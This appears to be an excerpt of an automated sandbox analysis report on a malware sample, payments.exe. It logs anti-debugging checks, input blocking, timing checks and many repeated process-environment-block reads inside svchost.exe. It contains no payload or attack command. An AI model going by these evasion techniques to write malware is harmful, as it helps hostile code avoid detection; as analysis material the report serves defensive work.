                Source: 72Z53078.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: 72Z53078.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: 72Z53078.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417983 LdrLoadDll,2_2_00417983
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CE6AAF BlockInput,0_2_00CE6AAF
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00C93D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C93D19
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CC3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00CC3920
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CAE01E LoadLibraryA,GetProcAddress,0_2_00CAE01E
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_010AE1E0 mov eax, dword ptr fs:[00000030h]0_2_010AE1E0
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_010AE240 mov eax, dword ptr fs:[00000030h]0_2_010AE240
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_010ACBB0 mov eax, dword ptr fs:[00000030h]0_2_010ACBB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D437C mov eax, dword ptr fs:[00000030h]2_2_037D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA352 mov eax, dword ptr fs:[00000030h]2_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8350 mov ecx, dword ptr fs:[00000030h]2_2_037D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C310 mov ecx, dword ptr fs:[00000030h]2_2_0372C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750310 mov ecx, dword ptr fs:[00000030h]2_2_03750310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037663FF mov eax, dword ptr fs:[00000030h]2_2_037663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov ecx, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov ecx, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC3CD mov eax, dword ptr fs:[00000030h]2_2_037EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B63C0 mov eax, dword ptr fs:[00000030h]2_2_037B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380634F mov eax, dword ptr fs:[00000030h]2_2_0380634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372826B mov eax, dword ptr fs:[00000030h]2_2_0372826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A250 mov eax, dword ptr fs:[00000030h]2_2_0372A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736259 mov eax, dword ptr fs:[00000030h]2_2_03736259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov eax, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov ecx, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372823B mov eax, dword ptr fs:[00000030h]2_2_0372823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038062D6 mov eax, dword ptr fs:[00000030h]2_2_038062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402A0 mov eax, dword ptr fs:[00000030h]2_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402A0 mov eax, dword ptr fs:[00000030h]2_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov ecx, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380625D mov eax, dword ptr fs:[00000030h]2_2_0380625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C156 mov eax, dword ptr fs:[00000030h]2_2_0372C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C8158 mov eax, dword ptr fs:[00000030h]2_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov ecx, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760124 mov eax, dword ptr fs:[00000030h]2_2_03760124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov ecx, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038061E5 mov eax, dword ptr fs:[00000030h]2_2_038061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F0115 mov eax, dword ptr fs:[00000030h]2_2_037F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037601F8 mov eax, dword ptr fs:[00000030h]2_2_037601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]2_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]2_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03770185 mov eax, dword ptr fs:[00000030h]2_2_03770185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C073 mov eax, dword ptr fs:[00000030h]2_2_0375C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732050 mov eax, dword ptr fs:[00000030h]2_2_03732050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6050 mov eax, dword ptr fs:[00000030h]2_2_037B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6030 mov eax, dword ptr fs:[00000030h]2_2_037C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A020 mov eax, dword ptr fs:[00000030h]2_2_0372A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C020 mov eax, dword ptr fs:[00000030h]2_2_0372C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4000 mov ecx, dword ptr fs:[00000030h]2_2_037B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C0F0 mov eax, dword ptr fs:[00000030h]2_2_0372C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037720F0 mov ecx, dword ptr fs:[00000030h]2_2_037720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0372A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037380E9 mov eax, dword ptr fs:[00000030h]2_2_037380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B60E0 mov eax, dword ptr fs:[00000030h]2_2_037B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B20DE mov eax, dword ptr fs:[00000030h]2_2_037B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov eax, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov ecx, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037280A0 mov eax, dword ptr fs:[00000030h]2_2_037280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C80A8 mov eax, dword ptr fs:[00000030h]2_2_037C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373208A mov eax, dword ptr fs:[00000030h]2_2_0373208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738770 mov eax, dword ptr fs:[00000030h]2_2_03738770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730750 mov eax, dword ptr fs:[00000030h]2_2_03730750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE75D mov eax, dword ptr fs:[00000030h]2_2_037BE75D
